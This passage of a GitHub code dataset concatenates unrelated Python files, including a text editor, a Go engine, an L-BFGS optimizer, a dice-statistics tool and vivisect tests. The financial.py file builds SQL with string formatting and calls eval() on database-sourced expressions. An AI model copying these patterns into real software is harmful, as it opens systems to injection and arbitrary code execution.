chars = len(content)\n self.utility_labels[\"Characters\"].set_text(str(chars))\n\n sentences = len(re.findall(r'[.!?]\\s', content)) + 1\n self.utility_labels[\"Sentences\"].set_text(str(sentences))\n\n paragraphs = len(re.findall(r'\\n\\s*\\n', content)) + 1\n self.utility_labels[\"Paragraphs\"].set_text(str(paragraphs))\n\n reading_time = int(words / 200) # Assuming 200 words per minute reading speed\n self.utility_labels[\"Reading time\"].set_text(str(reading_time) + \" min\")\n\n # Add the update_utility_pane method call to the on_text_buffer_changed method\n def on_text_buffer_changed(self, text_buffer):\n self.update_title()\n self.update_utility_pane()\n\nclass TextEditorApplication(Gtk.Application):\n \n def __init__(self):\n super().__init__(application_id=\"org.monster.writher\")\n self.window = None\n\n def do_activate(self):\n if not self.window:\n self.window = TextEditor()\n self.window.set_application(self)\n self.window.show_all()\n self.add_window(self.window)\n self.window.present()\n\n def do_startup(self):\n Gtk.Application.do_startup(self)\n \n def close_request(self):\n if self.window:\n self.window.confirm_close(None)\n self.quit()\n \n def do_delete_event(self, window, event):\n if self.window.confirm_close(None):\n self.window.destroy()\n return True\n\n def do_window_removed(self, window):\n if self.get_windows():\n self.quit()\n \n def do_shutdown(self):\n if self.window:\n self.window.destroy()\n Gtk.Application.do_shutdown(self)\n\nif __name__ == \"__main__\":\n app = TextEditorApplication()\n app.run(None)\n","repo_name":"hardcoeur/Writher","sub_path":"writher.py","file_name":"writher.py","file_ext":"py","file_size_in_byte":13067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20822575343","text":"import sys\nfrom analyzer.txtanalyzer import TxtAnalyzer\nfrom analyzer.analyzer import AnalyzerException\nfrom handprinter import HandPrinter\n\nclass HandHistoryParser:\n \n def parseHistoryTexts(self, historyTexts, ignoreBetSize, useSimpleNames, excludeNoHeroHH):\n \"\"\"Parse list of input histories and return tuple list with hand id and parsed history\"\"\"\n \n parseResult = []\n \n for historyText in historyTexts:\n analyzer = TxtAnalyzer(historyText)\n analyzer.analyze()\n \n #exclude hand history without hero if option is active\n if((excludeNoHeroHH and analyzer.hero) or not excludeNoHeroHH):\n handprinter = HandPrinter(analyzer,ignoreBetSize, useSimpleNames)\n parsedHistory = handprinter.printHand()\n parseResult.append((analyzer.handId, parsedHistory))\n \n return parseResult\n\n def parseHandHistory(self, inputFile, outputFile):\n \n try:\n \n with open(inputFile) as file:\n history = file.read()\n analyzer = TxtAnalyzer(history)\n analyzer.analyze()\n \n handprinter = HandPrinter(analyzer,False,False)\n handprinter.printHandToFile(outputFile) \n \n print(\"Parsing successful\")\n \n except AnalyzerException as e:\n print(\"Parsing failed\")\n print(\"Error: \",e) \n \n \nif __name__ == \"__main__\":\n if(len(sys.argv) < 3):\n print(\"Invalid arguments -> hhp inputfile outputfile\")\n \n inputFile = sys.argv[1]\n outputFile = sys.argv[2]\n hhp = HandHistoryParser()\n hhp.parseHandHistory(inputFile, outputFile) \n\n\n\n\n \n \n","repo_name":"TheHighFish/openholdembot","sub_path":"RegressionTests/Tools/HandHistoryParser/hhp.py","file_name":"hhp.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"6668575382","text":"\"\"\"empty message\n\nRevision ID: bd1bcd9ebd07\nRevises: \nCreate Date: 2021-08-14 13:01:44.001166\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bd1bcd9ebd07'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('student',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.Column('surname', sa.String(length=120), nullable=True),\n sa.Column('room', sa.Integer(), nullable=True),\n sa.Column('chat_id', sa.Integer(), nullable=True),\n sa.Column('date', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('chat_id')\n )\n op.create_index(op.f('ix_student_name'), 'student', ['name'], unique=False)\n op.create_index(op.f('ix_student_surname'), 'student', ['surname'], unique=False)\n op.create_table('problems',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('text', sa.String(), nullable=True),\n sa.Column('student_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['student_id'], ['student.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_problems_text'), 'problems', ['text'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_problems_text'), table_name='problems')\n op.drop_table('problems')\n op.drop_index(op.f('ix_student_surname'), table_name='student')\n op.drop_index(op.f('ix_student_name'), table_name='student')\n op.drop_table('student')\n # ### end Alembic commands ###\n","repo_name":"t1fan-prog/final-flask","sub_path":"migrations/versions/bd1bcd9ebd07_.py","file_name":"bd1bcd9ebd07_.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19386464980","text":"import re\nfrom itertools import product\nfrom collections import Counter\nfrom termgraph.termgraph import chart\n\n\n# i.e 1d4+2d4+1+-1\ndef validInput(inp: str) -> bool:\n li = inp.split('+')\n for i in li:\n if bool(re.match(r'^-[0-9]+d[0-9]+$|^[0-9]+d[0-9]+$|^-[0-9]+$|^[0-9]+$',i)) == False:\n return False\n return True\n\ndef modToDice(inp: str) -> list:\n li = inp.split('+')\n dicedmod=[]\n for i in li:\n if bool(re.match(r'^-[0-9]+d[0-9]+$|^[0-9]+d[0-9]+$',i)) == False:\n if i[0] == '-':\n dicedmod.append(f'{i}d1')\n else:\n dicedmod.append(f'{i}d1')\n else:\n dicedmod.append(i)\n return dicedmod\n\n# ['2d4','1d8','8d1']\ndef separateDice(inp: str) -> list:\n dicedmod = modToDice(inp)\n finalDiceList=[]\n for i in dicedmod:\n if i[0] == '-':\n for _ in range(int(i[1:i.index('d')])):\n finalDiceList.append(f'-1{i[i.index(\"d\"):]}')\n else:\n for _ in range(int(i[0:i.index('d')])):\n finalDiceList.append(f'1{i[i.index(\"d\"):]}')\n return finalDiceList\n\ndef stats(inp: str, termgraph_args: dict):\n finalDice = separateDice(inp)\n finalList=[]\n for i in finalDice:\n li=[]\n if i[0] == '-':\n for j in range(int(f'-{i[3:]}'),0):\n li.append(j)\n else:\n for k in range(1,int(i[2:])+1):\n li.append(k)\n finalList.append(li)\n dice_combination = product(*finalList)\n space = list(map(sum,dice_combination))\n space.sort()\n print()\n print(f'min: {space[0]}')\n print(f'max: {space[-1]}')\n print(f'average: {sum(space)/len(space)}')\n print()\n freqs = Counter(space)\n labels = list(map(str,list(freqs.keys())))\n data = []\n for i in list(freqs.values()):\n dataco=[]\n dataco.append(i)\n data.append(dataco)\n\n chart(colors=[],args=termgraph_args,labels=labels,data=data)\n","repo_name":"neel-bp/band_dice_stats","sub_path":"band_dice_stats/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12528078799","text":"flames = {\r\n 0: 'Not Compatible',\r\n 1: 'Friends',\r\n 2: 'Lovers',\r\n 3: 'Affection',\r\n 4: 'Marriage',\r\n 5: 'Enemies',\r\n 6: 'Siblings',\r\n}\r\nname = input(\"Enter your name: \").replace(' ','').lower()\r\npartner = input(\"Enter partner's name: \").replace(' ','').lower()\r\na,b = [],[]\r\nnamerem = parrem = ''\r\n\r\nfor x in name:\r\n a.append(x)\r\nfor x in partner:\r\n b.append(x)\r\n\r\nfor x in a:\r\n if x not in b:\r\n namerem += x\r\nfor x in b:\r\n if x not in a:\r\n parrem += x\r\n\r\nsum = len(namerem)+len(parrem)\r\n\r\nprint(f'Your Name\\t\\t\\t\\t\\t\\t\\t: {name}\\n'\r\n f'Partner\\'s\\t\\t\\t\\t\\t\\t\\t: {partner}\\n\\n'\r\n f'Your remaining letters\\t\\t\\t\\t: {\",\".join(namerem)}\\n'\r\n f'Partner\\'s remaining letters\\t\\t\\t: {\",\".join(parrem)}\\n'\r\n f'Your remaining letters(count)\\t\\t: {len(namerem)}\\n'\r\n f'Partner\\'s remaining letters(count)\\t: {len(parrem)}\\n'\r\n f'Sum\\t\\t\\t\\t\\t\\t\\t\\t\\t: {sum}\\n'\r\n f'Relationship\\t\\t\\t\\t\\t\\t:{flames[6] if sum%6 == 0 else flames[sum%6] if sum > 6 else flames[sum]}')","repo_name":"ExtraRixe/Prometheus","sub_path":"Python/IT5 Activties/2ndExaminationUsingDictionary.py","file_name":"2ndExaminationUsingDictionary.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38532335537","text":"# -*- coding: utf-8 -*-\nimport functools\nimport numpy as np\nfrom abstract_optimizer import AbstractOptimizer\nfrom util.line_search import *\n\n\nclass LBFGS(AbstractOptimizer):\n def __init__(self, correction=10, max_iter=100, is_plot_loss=True, epoches_record_loss=10):\n super(LBFGS, self).__init__()\n self._correction = correction\n self._max_iter = max_iter\n self._is_plot_loss = is_plot_loss\n self._epoches_record_loss = epoches_record_loss\n self._tol = 1e-9\n\n def optim(self, feval, X, y, parameter):\n f = functools.partial(feval, X=X, y=y)\n loss, gk = f(parameter)\n dk = -gk\n directions = np.zeros((len(gk), 0))\n steps = np.zeros((len(gk), 0))\n gktd = np.dot(gk.T, dk)\n alpha = min(1, 1 / np.sum(np.abs(gk)))\n alpha, loss, gk_plus, parameter = wolfe(f, parameter, dk, alpha, sigma=0.9, max_iter=10)\n for epoch in xrange(self._max_iter):\n loss_old = loss\n dk, directions, steps = self._lbfgs_update(gk, gk_plus, dk, alpha, directions, steps)\n gk, gktd_plus = gk_plus, np.dot(gk_plus.T, dk)\n if gktd_plus > - self._tol:\n self._logger.info('directional derivative below tol.')\n break\n alpha = alpha * min(2, gktd / gktd_plus)\n gktd = gktd_plus\n alpha, loss, gk_plus, parameter = wolfe(f, parameter, dk, alpha)\n if np.sum(np.abs(alpha * dk)) <= self._tol:\n self._logger.info('step size below tol.')\n break\n if np.abs(loss - loss_old) < self._tol:\n self._logger.info('loss changing by less than tol.')\n break\n if epoch % self._epoches_record_loss == 0 or epoch == self._max_iter - 1 and loss is not None:\n self.losses.append(loss)\n self._logger.info('Epoch %d\\tloss: %f' % (epoch, loss))\n if self._is_plot_loss is True:\n self.plot()\n return parameter\n\n def _lbfgs_update(self, gk, gk_plus, dk, alpha, directions, steps):\n y = gk_plus - gk\n s = alpha * dk\n directions, steps, Hk = self._limit_memory(y, s, directions, steps)\n dk_plus = self._bfgs_update(Hk, directions, steps, -gk_plus)\n return dk_plus, directions, steps\n\n def _limit_memory(self, y, s, direction, step):\n yts = np.dot(y.T, s)\n nCorr = direction.shape[1]\n if nCorr < self._correction:\n direction = np.hstack([direction, s.reshape(-1, 1)])\n step = np.hstack([step, y.reshape(-1, 1)])\n else:\n direction = np.hstack([direction[:, 1:], s.reshape(-1, 1)])\n step = np.hstack([step[:, 1:], y.reshape(-1, 1)])\n Hk = yts / np.dot(y.T, y)\n return direction, step, Hk\n\n def _bfgs_update(self, Hk, s, y, d):\n r = d\n k = s.shape[1]\n rho = np.zeros(k)\n for i in xrange(k):\n rho[i] = 1. / np.dot(y[:, i].T, s[:, i])\n alpha = np.zeros((k, 1))\n for i in xrange(k - 1, -1, -1):\n alpha[i] = rho[i] * np.dot(s[:, i].T, r)\n r = r - alpha[i] * y[:, i]\n r *= Hk\n for i in xrange(k):\n beta = rho[i] * np.dot(y[:, i].T, r)\n r = r + (alpha[i] - beta) * s[:, i]\n return r\n","repo_name":"wyslatitude/FunnyPyML","sub_path":"optimizer/lbfgs.py","file_name":"lbfgs.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9414347146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-09-06 16:51:18\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os\nimport MySQLdb\nimport time\nimport re\nimport db_mysql\nfrom decimal import *\nimport math\n\n\nclass Financial(object):\n def __init__(self, cu_no, create_time):\n self.cu_no = cu_no\n self.create_time = create_time\n self.db_object = db_mysql.db_object()\n self.conn = self.db_object[0]\n self.cur = self.db_object[1]\n\n def express_resolve(self, name):\n \"\"\"\n 通过name解析express表达式\n \"\"\"\n self.query = 'SELECT express FROM cr_report_item_config WHERE name LIKE \"%{name}%\"'.format(name=name)\n self.express = db_mysql.db_select_on(self.query) # 表达式\n print(self.express[0]) # 输出表达式\n\n self.exprs = re.findall(r'[a-zA-Z]{2}\\d{1}', self.express[0]) # 表达式指标表\n self.exprs1 = re.findall(r\"\\'\\d{3,4}\\'\", self.express[0]) # 指标项\n print(self.exprs)\n print(self.exprs1)\n li = []\n for j, i in enumerate(self.exprs):\n self.tab, self.years = self.ret_table(i) # 获取表名和年度\n print(self.tab, self.years)\n self.index_terms = self.exprs1[j][1:-1] # 获取指标项line_num\n print(self.index_terms)\n # 查询数据库数据,substring(report_date,1,4)截取日期中的年\n # SELECT * FROM `cr_core_income_statement` WHERE SUBSTRING(report_date,1,4) = '2016'\n self.query1 = 'SELECT item_sum FROM {table} WHERE cu_no=\"{cu_no}\" AND\\\n line_num=\"{line_num}\" AND SUBSTRING(report_date,1,4)=\"{date}\" and SUBSTRING(createTime,1,10)=\"{create_time}\"'.format( \\\n table=self.tab, cu_no=self.cu_no, line_num=self.index_terms, date=self.years,\n create_time=self.create_time)\n # print self.query1\n self.resu = db_mysql.db_select_on(self.query1) # 获取数据值item_sum 返回元组\n li.append(self.resu)\n\n print(li)\n s = re.sub(r\"\\w+\\[\\'\\d+\\'\\]\", '?', self.express[0])\n exp = self.replace_exp(s, li).lower()\n print(exp, eval(exp))\n\n def replace_exp(self, s, li):\n \"\"\"\n 表达式中的指标项替换为数据库查询的数据\n \"\"\"\n self.m = ''\n for i in li:\n if self.m == '':\n self.s = s.replace('?', str(i[0]), 1)\n self.m = self.s\n else:\n self.m = self.m.replace('?', str(i[0]), 1)\n return self.m\n\n def ret_table(self, expr):\n \"\"\"\n 根据表达式指标表返回数据表和年度表数据\n \"\"\"\n self.ta = expr[:2]\n self.years = expr[2:]\n if self.ta == 'zf':\n self.ta1 = 'cr_core_balance_sheet' # 资产负债表\n elif self.ta == 'xl':\n self.ta1 = 'cr_core_cashflow_statement' # 现金流量表\n else:\n self.ta1 = 'cr_core_income_statement' # 损益表\n\n if self.years == '1':\n self.years1 = '2016'\n elif self.years == '2':\n self.years1 = '2015'\n else:\n self.years1 = '2014'\n return self.ta1, self.years1\n\n\nif __name__ == '__main__':\n name = '净利润增长率(单位:%)'\n create_time = '2016-09-08'\n fin = Financial('1420a551-b76c-4ef1-902d-49226777e0ec', create_time)\n fin.express_resolve(name)\n # exec('print 1+3+4')\n\n\n # eval:计算字符串中的表达式\n # exec:执行字符串中的语句\n # execfile:用来执行一个文件\n","repo_name":"xycfree/python_linux","sub_path":"other/financial.py","file_name":"financial.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70535422189","text":"from __future__ import annotations\nimport copy\nfrom dlgo.gotypes import Player, Point\nfrom dlgo.scoring import compute_game_result\nfrom dlgo import zobrist\nfrom dlgo.utils.utils import MoveAge\nfrom typing import Tuple, Dict, List, Iterable, Optional, FrozenSet, cast\n\nfrom dlgo.utils.profiling import timing\n\n__all__ = [\n 'Board',\n 'GameState',\n 'Move',\n 'GoString'\n]\n\nneighbor_tables = {}\ncorner_tables = {}\n\n\ndef init_neighbor_table(dim: Tuple[int, int]):\n rows, cols = dim\n new_table: Dict[Point, List[Point]] = {}\n for r in range(1, rows + 1):\n for c in range(1, cols + 1):\n p = Point(row=r, col=c)\n full_neighbors = [\n Point(p.row - 1, p.col),\n Point(p.row + 1, p.col),\n Point(p.row, p.col - 1),\n Point(p.row, p.col + 1),\n ]\n true_neighbors = [\n n for n in full_neighbors\n if 1 <= n.row <= rows and 1 <= n.col <= cols]\n new_table[p] = true_neighbors\n neighbor_tables[dim] = new_table\n\n\ndef init_corner_table(dim: Tuple[int, int]):\n rows, cols = dim\n new_table: Dict[Point, List[Point]] = {}\n for r in range(1, rows + 1):\n for c in range(1, cols + 1):\n p = Point(row=r, col=c)\n full_corners = [\n Point(p.row - 1, p.col - 1),\n Point(p.row - 1, p.col + 1),\n Point(p.row + 1, p.col - 1),\n Point(p.row + 1, p.col + 1),\n ]\n true_corners = [\n n for n in full_corners\n if 1 <= n.row <= rows and 1 <= n.col <= cols]\n new_table[p] = true_corners\n corner_tables[dim] = new_table\n\n\nclass IllegalMoveError(Exception):\n pass\n\n\nclass GoString:\n \"\"\"\n Immutable !\n Keeps track of a group of connected stones and their liberties\n \"\"\"\n\n def __init__(self, color: Player, stones: Iterable[Point], liberties: Iterable[Point]):\n self.color = color\n self.stones = frozenset(stones)\n self.liberties = frozenset(liberties)\n\n def without_liberty(self, point) -> GoString:\n new_liberties = self.liberties - {point}\n return GoString(self.color, self.stones, new_liberties)\n\n def with_liberty(self, point) -> GoString:\n new_liberties = self.liberties | {point}\n return GoString(self.color, self.stones, new_liberties)\n\n def merged_with(self, go_string: GoString) -> GoString:\n assert go_string.color == self.color\n combined_stones = self.stones | go_string.stones\n combined_liberties = (self.liberties | go_string.liberties) - combined_stones\n return GoString(self.color, combined_stones, combined_liberties)\n\n @property\n def num_liberties(self) -> int:\n return len(self.liberties)\n\n\nclass Board:\n def __init__(self, num_rows: int, num_cols: int):\n self.num_rows = num_rows\n self.num_cols = num_cols\n self._grid: Dict[Point, Optional[GoString]] = {}\n self._hash = zobrist.EMPTY_BOARD\n\n dim = (num_rows, num_cols)\n if dim not in neighbor_tables:\n init_neighbor_table(dim)\n if dim not in corner_tables:\n init_corner_table(dim)\n self.neighbor_table = neighbor_tables[dim]\n self.corner_table = corner_tables[dim]\n self.move_ages = MoveAge(self)\n\n def neighbors(self, point) -> List[Point]:\n return self.neighbor_table[point]\n\n def corners(self, point) -> List[Point]:\n return self.corner_table[point]\n\n def place_stone(self, player: Player, point: Point):\n assert self.is_on_grid(point)\n if self._grid.get(point) is not None:\n print('Illegal play on %s' % str(point))\n raise IllegalMoveError()\n assert self._grid.get(point) is None\n adjacent_same_color: List[GoString] = []\n adjacent_opposite_color: List[GoString] = []\n liberties: List[Point] = []\n self.move_ages.increment_all()\n self.move_ages.add(point)\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n liberties.append(neighbor)\n elif neighbor_string.color == player:\n if neighbor_string not in adjacent_same_color:\n adjacent_same_color.append(neighbor_string)\n else:\n if neighbor_string not in adjacent_opposite_color:\n adjacent_opposite_color.append(neighbor_string)\n\n new_string = GoString(player, [point], liberties)\n\n for same_color_string in adjacent_same_color:\n new_string = new_string.merged_with(same_color_string)\n for new_string_point in new_string.stones:\n self._grid[new_string_point] = new_string\n\n self._hash ^= zobrist.HASH_CODE[point, player]\n\n for other_color_string in adjacent_opposite_color:\n replacement = other_color_string.without_liberty(point)\n if replacement.num_liberties:\n self._replace_string(replacement)\n else:\n self._remove_string(other_color_string)\n\n def _replace_string(self, new_string: GoString):\n for point in new_string.stones:\n self._grid[point] = new_string\n\n def _remove_string(self, string: GoString):\n for point in string.stones:\n self.move_ages.reset_age(point)\n # Removing a string can create liberties for other strings.\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n continue\n if neighbor_string is not string:\n self._replace_string(neighbor_string.with_liberty(point))\n self._grid[point] = None\n self._hash ^= zobrist.HASH_CODE[point, string.color]\n\n def is_self_capture(self, player: Player, point: Point) -> bool:\n friendly_strings = []\n for neighbor in self.neighbors(point):\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n # This point has a liberty. Can't be self capture.\n return False\n elif neighbor_string.color == player:\n # Gather for later analysis.\n friendly_strings.append(neighbor_string)\n else:\n if neighbor_string.num_liberties == 1:\n # This move is real capture, not a self capture.\n return False\n if all(neighbor.num_liberties == 1 for neighbor in friendly_strings):\n return True\n return False\n\n def will_capture(self, player: Player, point: Point) -> bool:\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n continue\n elif neighbor_string.color == player:\n continue\n else:\n if neighbor_string.num_liberties == 1:\n # This move would capture.\n return True\n return False\n\n def is_on_grid(self, point: Point) -> bool:\n return 1 <= point.row <= self.num_rows and 1 <= point.col <= self.num_cols\n\n def get(self, point: Point) -> Optional[Player]:\n string = self._grid.get(point)\n if string is None:\n return None\n return string.color\n\n def get_go_string(self, point: Point) -> Optional[GoString]:\n return self._grid.get(point)\n\n def __eq__(self, other):\n return isinstance(other, Board) and \\\n self.num_rows == other.num_rows and \\\n self.num_cols == other.num_cols and \\\n self._hash == other._hash\n\n def __deepcopy__(self, memodict=None):\n copied = Board(self.num_rows, self.num_cols)\n # Can do a shallow copy b/c the dictionary maps tuples\n # (immutable) to GoStrings (also immutable)\n copied._grid = self._grid.copy()\n copied._hash = self._hash\n return copied\n\n def zobrist_hash(self) -> int:\n return self._hash\n\n\nclass Move:\n def __init__(self, point: Point = None, is_pass: bool = False, is_resign: bool = False):\n \"\"\"\n Never call this constructor directly. Use @classmethod factories from this class.\n \"\"\"\n self.point = point\n self.is_play = (self.point is not None)\n self.is_pass = is_pass\n self.is_resign = is_resign\n assert self.is_play + self.is_pass + self.is_resign == 1\n\n @classmethod\n def play(cls, point: Point) -> Move:\n \"\"\"A move that places a stone on the board.\"\"\"\n return Move(point=point)\n\n @classmethod\n def pass_turn(cls) -> Move:\n return Move(is_pass=True)\n\n @classmethod\n def resign(cls) -> Move:\n return Move(is_resign=True)\n\n def __str__(self):\n if self.is_pass:\n return 'pass'\n if self.is_resign:\n return 'resign'\n return '(r %d, c %d)' % (self.point.row, self.point.col)\n\n def __hash__(self):\n return hash((self.is_play, self.is_pass, self.is_resign, self.point))\n\n def __eq__(self, other):\n return (self.is_play, self.is_pass, self.is_resign, self.point) == \\\n (other.is_play, other.is_pass, other.is_resign, other.point)\n\n\nclass GameState:\n def __init__(self, board: Board, next_player: Player, previous_state: Optional[GameState],\n last_move: Optional[Move]):\n self.board = board\n self.next_player = next_player\n self.previous_state = previous_state\n self.last_move = last_move\n if previous_state is None:\n self.previous_states: FrozenSet[Tuple[Player, int]] = frozenset()\n else:\n self.previous_states = frozenset(\n previous_state.previous_states | {(previous_state.next_player, previous_state.board.zobrist_hash())})\n\n def apply_move(self, move: Move) -> GameState:\n \"\"\"Return the new GameState after applying the move.\"\"\"\n if move.is_play:\n point = cast(Point, move.point)\n next_board = copy.deepcopy(self.board)\n next_board.place_stone(self.next_player, point)\n else:\n next_board = self.board\n return GameState(next_board, self.next_player.opposite, self, move)\n\n @classmethod\n def new_game(cls, board_size: int) -> GameState:\n board = Board(board_size, board_size)\n return GameState(board, Player.black, None, None)\n\n def is_move_self_capture(self, player, move):\n if not move.is_play:\n return False\n return self.board.is_self_capture(player, move.point)\n\n @property\n def situation(self) -> Tuple[Player, Board]:\n return self.next_player, self.board\n\n def does_move_violate_ko(self, player: Player, move: Move) -> bool:\n if not move.is_play:\n return False\n point = cast(Point, move.point)\n if not self.board.will_capture(player, point):\n return False\n next_board = copy.deepcopy(self.board)\n next_board.place_stone(player, point)\n next_situation = (player.opposite, next_board.zobrist_hash())\n return next_situation in self.previous_states\n\n def is_valid_move(self, move: Move) -> bool:\n if self.is_over():\n return False\n if move.is_pass or move.is_resign:\n return True\n return (\n self.board.get(cast(Point, move.point)) is None and\n not self.is_move_self_capture(self.next_player, move) and\n not self.does_move_violate_ko(self.next_player, move))\n\n def is_over(self) -> bool:\n if self.last_move is None:\n return False\n if self.last_move.is_resign:\n return True\n previous_state = cast(GameState, self.previous_state)\n second_last_move = previous_state.last_move\n if second_last_move is None:\n return False\n return self.last_move.is_pass and second_last_move.is_pass\n\n def legal_moves(self) -> List[Move]:\n if self.is_over():\n return []\n moves = []\n for row in range(1, self.board.num_rows + 1):\n for col in range(1, self.board.num_cols + 1):\n move = Move.play(Point(row, col))\n if self.is_valid_move(move):\n moves.append(move)\n # These two moves are always legal.\n moves.append(Move.pass_turn())\n moves.append(Move.resign())\n\n return moves\n\n def winner(self) -> Optional[Player]:\n if not self.is_over():\n return None\n if self.last_move and self.last_move.is_resign:\n return self.next_player\n game_result = compute_game_result(self)\n return game_result.winner\n","repo_name":"vadozy/go-bot","sub_path":"src/dlgo/goboard.py","file_name":"goboard.py","file_ext":"py","file_size_in_byte":12939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71020541226","text":"'''\nWhile (enquanto)\nutilizamos para realizar ações enquanto uma condiçaõ for verdadeira.\n* Requisitos: Entender condiçõe se operações\n'''\n'''while True: #loop infinito\n nome = input('Nome: ')\n print(f'Olá {nome}') '''\n\nx = 0\ny = 0\n'''while x <= 10:\n print(x)\n x = x+ 1\nprint('FIM')'''\n\n'''while x < 10:\n if x == 3: #se x é igual a 3 não vai ser lido o restante do cod\n x = x + 1\n continue # sempre que usado tudo após a ele não será lido\n print(x)\n x = x + 1\nprint('FIM')'''\n\n'''while x < 10:\n if x == 3:\n x = x + 1\n break # finaliza o cod\n print(x)\n x = x + 1'''\n\n'''__________________________________________________________________'''\n'''while x < 10:\n y = 0\n while y < 5:\n print(f'X vale{x} e Y vale {y}')\n y += 1\n x += 1 # x = x + 1\nprint('FIM')'''\n\n'''---------------------------------------------------------------------------'''\n\nwhile True:\n num_1 = input('Digite um número: ')\n num_2 = input('Digite outro número: ')\n operador = input('Digite um operador: ')\n sair = input('deseja sair? [s]im oi [n]ão')\n\n if not num_1.isnumeric() or not num_2.isnumeric():\n print('Você precisa digitar um número')\n continue\n\n num_1 = int(num_1)\n num_2 = int(num_2)\n\n # + - / *\n if operador == '+':\n print(num_1 + num_2)\n elif operador == '-':\n print(num_1 - num_2)\n elif operador == '/':\n print(num_1 / num_2)\n elif operador == '*':\n print(num_1 * num_2)\n else:\n print('Operador inválido.')\n if sair == 's':\n break\n","repo_name":"LFWinther/CursoPython","sub_path":"Aulas1/aula34.py","file_name":"aula34.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267508914","text":"import os\nimport unittest\nimport vivisect\nimport vivisect.tests.vivbins as vivbins\nimport vivisect.tools.graphutil as viv_graph\n\nclass VivGraphTest(unittest.TestCase):\n\n def getTestWorkspace(self, fname, analyze=True):\n fpath = os.path.join('vivisect','bins',fname)\n vw = vivisect.VivWorkspace()\n vw.loadFromFile(fpath)\n if analyze:\n vw.analyze()\n return vw\n\n def getAnsWorkspace(self, fname):\n fpath = os.path.join('vivisect','bins','%s.viv' % fname)\n vw = vivisect.VivWorkspace()\n vw.loadWorkspace(fpath)\n return vw\n\n def checkGetCodePaths(self, vw, fva):\n graph = viv_graph.buildFunctionGraph(vw, fva )\n paths = [ path for path in viv_graph.getCodePaths(graph) ]\n self.codepaths = paths\n self.assertGreater(len(self.codepaths), 150)\n\n def checkGetCodePathsThru(self, vw, fva, cbva):\n graph = viv_graph.buildFunctionGraph(vw, fva )\n paths = [ path for path in viv_graph.getCodePathsThru(graph, cbva) ]\n self.codepathsthru = paths\n self.assertGreater(len(self.codepaths), len(self.codepathsthru))\n\n paths = [ path for path in graph.getHierPathsThru((cbva,)) ]\n self.hiercodepathsthru = paths\n self.assertGreater(len(self.codepaths), len(self.hiercodepathsthru))\n\n def checkGetCodePathsFrom(self, vw, fva, cbva):\n graph = viv_graph.buildFunctionGraph(vw, fva )\n paths = [ path for path in viv_graph.getCodePathsFrom(graph, cbva) ]\n self.codepathsfrom = paths\n self.assertGreater(len(self.codepaths), 150)\n\n paths = [ path for path in (graph.getHierPathsFrom,((cbva,))) ]\n self.hierpathsfrom = paths\n self.assertGreater(len(self.codepaths), len(self.hierpathsfrom))\n\n def checkGetCodePathsTo(self, vw, fva, cbva):\n graph = viv_graph.buildFunctionGraph(vw, fva )\n paths = [ path for path in viv_graph.getCodePathsTo(graph, cbva) ]\n self.codepathsto = paths\n self.assertGreater(len(self.codepaths), len(self.codepathsto))\n\n paths = [ path for path in graph.getHierPathsTo((cbva,)) ]\n self.hierpathsto = paths\n self.assertGreater(len(self.codepaths), len(self.hierpathsto))\n\n def checkGetLoopPaths(self, vw, fva):\n graph = viv_graph.buildFunctionGraph(vw, fva )\n paths = [ path for path in viv_graph.getLoopPaths(graph) ]\n self.looppaths = paths\n self.assertGreater(len(self.codepaths), 150)\n\n def checkGetLongPath(self, vw, fva):\n graph = viv_graph.buildFunctionGraph(vw, fva)\n paths = [ path for path in viv_graph.getLongPath(graph) ]\n self.codepaths = paths\n self.assertGreater(len(self.codepaths), 150)\n\n def checkPathGenGetCodePaths(self, vw, fva):\n graph = viv_graph.buildFunctionGraph(vw, fva)\n paths = [ path for path in viv_graph.getCodePathsThru(graph) ]\n self.codepaths = paths\n self.assertGreater(len(self.codepaths), 150)\n\n def checkCoveragePaths(self, vw, fva):\n graph = viv_graph.buildFunctionGraph(vw, fva)\n paths = [ path for path in viv_graph.getCoveragePaths(graph, 150) ]\n self.codepaths = paths\n self.assertEqual(len(self.codepaths), 22)\n\n @vivbins.require\n def 